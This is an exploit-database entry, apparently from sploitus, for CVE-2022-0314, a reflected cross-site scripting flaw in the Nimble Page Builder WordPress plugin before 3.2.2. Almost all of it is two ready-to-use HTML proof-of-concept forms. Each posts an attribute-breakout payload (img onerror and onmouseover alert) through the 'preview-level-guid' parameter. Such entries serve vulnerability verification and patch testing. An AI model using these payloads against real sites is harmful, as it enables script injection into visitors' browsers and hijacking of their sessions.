Exploit for Nimble Page Builder < 3.2.2 - Reflected Cross-Site Scripting CVE-2022-0314

Name: Exploit for Nimble Page Builder < 3.2.2 - Reflected Cross-Site Scripting CVE-2022-0314
Rating: 5 (75 reviews)

2022-03-29 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:17585F16-C62C-422D-AD9C-9138B6DA97B7
v < 3.1.32
<form action="http://example.com/?customize_messenger_channel" method="POST">
    <input type="text" name="preview-level-guid" value='" xxx><img src onerror=alert(/XSS/)>'>
    <input type="submit" value="Exploit me pls" />
</form>

v < 3.2.2
<form action="http://example.com/?customize_messenger_channel" method="POST">
    <input type="text" name="preview-level-guid" value='" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//'>
    <input type="submit" value="Exploit me pls" />
</form>